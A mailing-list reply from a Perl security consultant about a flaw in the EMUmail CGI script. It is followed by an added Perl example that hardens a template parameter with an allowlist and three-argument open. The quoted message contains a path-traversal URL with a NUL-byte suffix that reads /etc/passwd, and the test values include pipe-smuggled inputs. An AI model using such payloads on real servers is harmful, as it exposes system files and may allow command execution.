>>>>> "MegaHz" == MegaHz <admin@cyhackportal.com> writes:

MegaHz> u can also do this:
MegaHz> http://site/emumail.cgi?type=/../../../../../etc/passwd%00

MegaHz> but u cannot do this:
MegaHz> http://site/emumail.cgi?type=/../../../../../bin/ls%20/%00

It's Perl, so I bet they didn't check for pipe symbols at the
beginning and ending either. That can launch things.

I wish people who write Perl code for the net would at *least* read
the Perl Web Security FAQ *at a minimum*, or hire an outside Perl
company (like Stonehenge :) to vet the code.

-- 
Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
<merlyn@stonehenge.com> <URL:http://www.stonehenge.com/merlyn/>
Perl/Unix/security consulting, Technical writing, Comedy, etc. etc.
See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training!
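
Added example, not part of the original message and not EMUmail's own code: the pipe and NUL-byte problem discussed above, with a hardened handler for a `type`-style parameter. The template directory, the allowed names, the `.html` suffix and the function names are assumptions made for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumed layout: templates live in one directory, named <type>.html.
my $TEMPLATE_DIR = '/var/www/emumail/templates';          # hypothetical path
my %ALLOWED = map { $_ => 1 } qw(inbox compose folders);  # hypothetical names

# Unsafe pattern (shown for contrast, never executed here):
#   open(FH, $file);    # $file built from the request
# Two-argument open reads the mode from the string itself, so a leading or
# trailing "|" runs a command instead of opening a file. On older Perls a
# NUL byte in the name also truncates the path at the C library, dropping
# any suffix the script appended.

# Return the validated template name, or undef if the value is rejected.
sub validate_type {
    my ($type) = @_;
    return unless defined $type;
    # Allowlist the character set: no "/", ".", "|", NUL or whitespace.
    return unless $type =~ /\A([A-Za-z0-9_]{1,32})\z/;
    my $clean = $1;
    # Then allowlist the values the application actually serves.
    return $ALLOWED{$clean} ? $clean : undef;
}

# Three-argument open fixes the mode to "<", so the filename is never
# parsed for pipes or redirections.
sub open_template {
    my ($type) = @_;
    my $clean = validate_type($type)
        or die "rejected template type\n";
    open(my $fh, '<', "$TEMPLATE_DIR/$clean.html")
        or die "cannot open template: $!\n";
    return $fh;
}

# Constructed sample inputs: the traversal value from the message (decoded),
# values with a pipe at the beginning and at the end, and one valid name.
for my $t ("/../../../../../etc/passwd\0", "|inbox", "inbox|", "inbox") {
    (my $shown = $t) =~ s/\0/\\0/g;
    printf "%-32s %s\n", $shown,
        defined(validate_type($t)) ? 'accepted' : 'rejected';
}
```

Only the last sample value is accepted; the other three fail the character allowlist before any filesystem call is made.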